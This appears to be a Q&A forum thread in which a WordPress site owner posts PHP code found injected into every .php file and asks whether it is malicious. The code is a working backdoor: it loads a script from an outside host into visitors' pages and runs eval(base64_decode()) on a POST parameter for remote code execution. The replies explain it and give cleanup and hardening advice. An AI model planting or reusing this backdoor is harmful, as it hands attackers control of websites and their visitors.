# What does this php script will do? Is it Malicious php Code?

Tags: php

Can someone please advise what this php code will do? I have found this code on every .php pages only. Other pages like js / css / php.ini are fine. Is this malicious code? If yes, please suggest how to prevent the malicious activity.

Here is the Code:

```
global $sessdt_o;
if(!$sessdt_o) { 
    $sessdt_o = 1; 
    $sessdt_k = "lb11"; 
    if(!@$_COOKIE[$sessdt_k]) { 
        $sessdt_f = "102"; 
        if(!@headers_sent()) { 
            @setcookie($sessdt_k,$sessdt_f); 
        } else { 
            echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
        } 
    } else { 
        if($_COOKIE[$sessdt_k]=="102") { 
            $sessdt_f = (rand(1000,9000)+1); 
            if(!@headers_sent()) { 
                @setcookie($sessdt_k,$sessdt_f); 
            } else { 
                echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
            } 
            $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; 
            $sessdt_v = urlencode(strrev($sessdt_j)); 
            $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); 
            echo "<script src='$sessdt_u'></script>"; 
            echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; 
        } 
    } 
    $sessdt_p = "showimg"; 
    if(isset($_POST[$sessdt_p])){ 
        eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
        exit;
    }
}
```

Comment: How did you get this code? Your PHP files were modified without your knowledge?

Comment: Hi Ali, I just open FileZila FTP , then found that every php pages are last modified at 14-September-2011 4:01:14 AM ( Indian Time ) then i open  file and found this code. it it really weird .

Answer (score 1):

It's more likely it will redirect your every page to attacker website.
The `@` will halt any errors so you wont get any logs from this script.

You should remove it if you want your site to work properly.

EDIT: it doesn't redirect but it will inject anything it wants on your pages.
The second part of the script where it checks for cookies will add a javascript from his website and can do malicious things.

The last part I don't think anyone will be able to guess what is it because it relies on some post variable and that's `$_POST['showimg']`, I guess he attacked your website with POST.

Things to do: Change your passwords, check for write permissions on your files, they shouldn't be `0777`, backup database and WordPress Template, delete WordPress install and re-install from scratch. In your template search for his code then add your cleaned template.

Comment: Thanks Mihai For Reply. My site is based os WordPress 3.2.1 which is latest wp version. almost every php pages of my site are affected. even wp-admin + wp- includes pages. i am really fear about that , Kindly Suggest what i have to do now.. Thanks Again For Help

Comment: Mahai , i have php.ini access for my server and decied to disble some php library function using php.ini disable function functionality, They are  [ eval | fopen | fclose | fputs | base64_decode | is_writable | opendir ] etc.. please suggest it is good.

Answer (score 1):

I haven't examined it closely, but only the line

```
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
```

shows me already that it is, if not malicious, then very very close - there is code injection possible.

Answer (score 1):

Your problem is not the code itself, it's how it got there in the first place. You need to check the write permissions on your files/folders to make sure no one from the outside can modify them.

You mentioned that you're using wordpress, please read [this article](http://codex.wordpress.org/Hardening_WordPress) about hardening wordpress security. I suggest that you lock down your blog (if it's feasible) until you fix your security issues.

Comment: Your first line is what made me give +1 - no one has addressed that. One thing to mention is that core wordpress is secure but addons and extensions can be very insecure and vulnerable including wordpress themes.

Answer (score 0):

im a security analyst and i believe it is redirecting you to a possible malicious website if and only if you do not have that cookie. if you already have that cookie then the script will know you have already been there and possibly researching the malware thus not executing the redirect. The image may be like a detect debugger preset API.. this is just my opinion.